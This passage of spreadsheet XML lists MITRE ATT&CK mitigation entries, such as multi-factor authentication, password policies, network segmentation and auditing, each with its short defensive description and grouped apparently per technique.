Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1029
Remote Data Storage
Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1020
SSL/TLS Inspection
Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1030
Network Segmentation
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t>
  </si>
  <si>
    <t xml:space="preserve">M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1030
Network Segmentation
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t>
  </si>
  <si>
    <t xml:space="preserve">M1020
SSL/TLS Inspection
Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1020
SSL/TLS Inspection
Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1030
Network Segmentation
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M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1036
Account Use Policies
Configure features related to account use like login attempt lockouts, specific login times, etc.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1027
Password Policies
Set and enforce secure password policies for accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1036
Account Use Policies
Configure features related to account use like login attempt lockouts, specific login times, etc.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1027
Password Policies
Set and enforce secure password policies for accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1036
Account Use Policies
Configure features related to account use like login attempt lockouts, specific login times, etc.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1025
Privileged Process Integrity
Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1025
Privileged Process Integrity
Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1030
Network Segmentation
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M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1043
Credential Access Protection
Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1025
Privileged Process Integrity
Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1043
Credential Access Protection
Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1025
Privileged Process Integrity
Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1027
Password Policies
Set and enforce secure password policies for accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1036
Account Use Policies
Configure features related to account use like login attempt lockouts, specific login times, etc.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1027
Password Policies
Set and enforce secure password policies for accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1013
Application Developer Guidance
This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
M1048
Application Isolation and Sandboxing
Restrict execution of code to a virtual environment on or in transit to an endpoint system.
M1050
Exploit Protection
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
M1019
Threat Intelligence Program
A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1027
Password Policies
Set and enforce secure password policies for accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1027
Password Policies
Set and enforce secure password policies for accounts.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1052
User Account Control
Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1021
Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1046
Boot Integrity
Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1013
Application Developer Guidance
This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1044
Restrict Library Loading
Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
M1052
User Account Control
Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1046
Boot Integrity
Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1046
Boot Integrity
Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1046
Boot Integrity
Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1052
User Account Control
Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1036
Account Use Policies
Configure features related to account use like login attempt lockouts, specific login times, etc.
M1015
Active Directory Configuration
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.
M1013
Application Developer Guidance
This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
M1027
Password Policies
Set and enforce secure password policies for accounts.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1028
Operating System Configuration
Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1046
Boot Integrity
Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1038
Execution Prevention
Block execution of code on a system through application control, and/or script blocking.
M1022
Restrict File and Directory Permissions
Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
M1024
Restrict Registry Permissions
Restrict the ability to modify certain hives or keys in the Windows Registry.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1055
Do Not Mitigate
This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1030
Network Segmentation
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M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1040
Behavior Prevention on Endpoint
Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1030
Network Segmentation
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M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1036
Account Use Policies
Configure features related to account use like login attempt lockouts, specific login times, etc.
M1015
Active Directory Configuration
